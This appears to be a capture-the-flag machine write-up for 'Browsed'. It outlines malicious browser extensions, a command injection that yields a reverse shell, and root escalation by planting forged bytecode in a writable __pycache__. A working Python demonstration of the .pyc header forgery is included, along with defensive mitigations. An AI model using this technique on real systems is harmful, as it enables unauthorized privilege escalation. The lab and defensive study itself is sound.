Machine Synopsis
`Browsed` is a medium-difficulty Linux machine centred around abusing browser extension functionality to reach internal services. By uploading a malicious Chrome extension, we intercept a developer’s browsing activity and uncover an internal Gitea instance hosting a Flask application. Source code analysis reveals a command injection vulnerability in a bash script exposed via a localhost-only endpoint; since the endpoint is not reachable from outside, we deliver a second extension that triggers the payload through the developer’s browser and obtain a reverse shell as user `larry`. For privilege escalation, the machine demonstrates insecure handling of Python bytecode: write access to a `__pycache__` directory used by a root-run script allows replacing a trusted `.pyc` file. Because the interpreter loads a cached `.pyc` without further verification whenever its header matches the source file’s mtime and size, the attacker’s bytecode executes as root.
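The privilege-escalation primitive above relies on how CPython validates a cached `.pyc`: a timestamp-based cache entry is trusted as long as the source mtime and size in its 16-byte header match the `.py` file, and the marshalled code object is then executed with no check of its contents. The following is an added example, not code from the machine or its author, that reproduces the technique in a temporary directory: it compiles a stand-in module, overwrites the cache entry with a forged `.pyc` carrying different code, and shows that the forged bytecode is what `import` runs. The module names `hx_trusted`/`hx_trusted_stale`, the `SOURCE`/`PAYLOAD` strings and the helper names are assumptions for the demonstration. The `match_header` flag also shows the failure mode a practitioner should expect: if the forged header does not match the source, the loader silently recompiles from source and the payload never runs.

```python
import importlib
import importlib.util
import marshal
import py_compile
import struct
import sys
import tempfile
from pathlib import Path

# Constructed stand-ins: what the root-run script "trusts" versus what the
# attacker plants in __pycache__. Real payloads would spawn a shell here.
SOURCE = 'def value():\n    return "source"\n'
PAYLOAD = 'def value():\n    return "bytecode"\n'


def forge_pyc(code, source_mtime, source_size):
    """Build a timestamp-based .pyc (PEP 552 flags=0) around an arbitrary code object.

    Header: 4-byte magic, 4-byte flags (0 = timestamp mode), 4-byte source mtime,
    4-byte source size, followed by the marshalled code object.
    """
    header = importlib.util.MAGIC_NUMBER + struct.pack(
        "<III", 0, int(source_mtime) & 0xFFFFFFFF, source_size & 0xFFFFFFFF
    )
    return header + marshal.dumps(code)


def run(module_name, match_header=True):
    """Plant a forged .pyc for `module_name` and return what the import executes.

    match_header=True  -> header mirrors the real source stat: cache is trusted.
    match_header=False -> header is stale: loader recompiles from the .py instead.
    """
    with tempfile.TemporaryDirectory() as tmp:
        src = Path(tmp) / f"{module_name}.py"
        src.write_text(SOURCE)

        # Populate __pycache__ the way a normal first import would.
        pyc = Path(importlib.util.cache_from_source(str(src)))
        py_compile.compile(
            str(src),
            cfile=str(pyc),
            invalidation_mode=py_compile.PycInvalidationMode.TIMESTAMP,
        )

        # Attacker step: overwrite the cached file with our own code object,
        # copying the mtime/size of the untouched .py so validation passes.
        st = src.stat()
        mtime = int(st.st_mtime) if match_header else int(st.st_mtime) - 1
        code = compile(PAYLOAD, str(src), "exec")
        pyc.write_bytes(forge_pyc(code, mtime, st.st_size))

        # Victim step: a fresh import of the module, as a root-run script would do.
        sys.path.insert(0, tmp)
        sys.modules.pop(module_name, None)
        importlib.invalidate_caches()
        try:
            return importlib.import_module(module_name).value()
        finally:
            sys.path.remove(tmp)
            sys.modules.pop(module_name, None)


if __name__ == "__main__":
    print("matching header :", run("hx_trusted"))            # forged bytecode runs
    print("stale header    :", run("hx_trusted_stale", False))  # source wins
```

The defensive takeaway is the same check in reverse: a `__pycache__` directory that is writable by a less-privileged user than the one importing from it is a code-execution path, and `python -B` or removing write permission on the cache directory closes it. Hash-based `.pyc` files (`PycInvalidationMode.CHECKED_HASH`) only move the trust to the source hash; they do not help when the cache directory itself is attacker-writable, since the attacker writes both the header and the code.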
Machine Matrix